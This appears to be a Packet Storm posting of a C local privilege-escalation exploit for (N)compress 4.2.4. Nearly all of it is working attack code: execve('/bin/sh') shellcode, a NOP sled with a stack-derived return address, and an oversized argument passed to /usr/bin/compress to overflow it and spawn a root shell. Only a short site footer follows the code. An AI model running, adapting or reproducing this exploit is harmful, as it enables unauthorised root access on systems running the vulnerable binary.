(N)compress 4.2.4 local root exploit.
8ad5fecf9ab689d4c57252919836ecd38d23f16efdaea8755879e04bdd2451c3#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define VULN "/usr/bin/compress"
#define NOP 0x90909090
#define NOPLEN 500
/* This shellcode was taken from some exploit I dont know who wrote it */
const unsigned char linux_x86_exec_hellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" mov %esp, %eax");
}
void usage(char *prog)
{
printf("<+> (N)compress 4.2.4 Exploit\n");
printf("<+> By: Lunar Fault [ElectronicSouls]\n");
printf("<+> Information System Advancement in Penetration (ISAP) Laboratories
\n");
printf("<!> usage: %s [options]\n", prog);
printf("\t\t-h help\n");
printf("\t\t-o <offset> Example: 100\n");
printf("\t\t-r <return> Example: 0xbfffc680\n");
printf("\t\t-s <size> Example: 1056\n");
exit(1);
}
int main(int argv, char *argc[]) {
int i, c, ret, offset;
long len;
char *buffer, tmpbuf[10];
offset = 0;
len = 1056;
ret = get_sp();
ret = ret - 100; /* Subtracting 100 from sp to bring the return somewhere in
the NOP */
if (argv > 1) {
while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) {
switch(c) {
case 'r':
ret = strtoll(optarg, NULL, 0);
break;
case 's':
len = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
case 'h':
usage(argc[0]);
}
}
}
buffer = (char *) malloc(len);
ret = ret + offset;
for (i=0;i<len;i+=4)
*(long*) &buffer[i] = NOP;
for (i=NOPLEN;i<len;i+=4)
*(long*) &buffer[i] = ret;
memcpy(buffer+NOPLEN, linux_x86_exec_hellcode, strlen(linux_x86_exec_hellcode
));
printf("<+> (N)compress 4.2.4 Exploit\n");
printf("<+> By: Lunar Fault [ElectronicSouls]\n");
printf("<+> Information System Advancement in Penetration (ISAP) Laboratories
\n");
printf("<*> Offset = %d\n", offset);
printf("<*> Return = 0x%.8x\n", ret);
printf("<*> Size = %d\n\n", len);
execl(VULN, VULN, buffer, 0);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed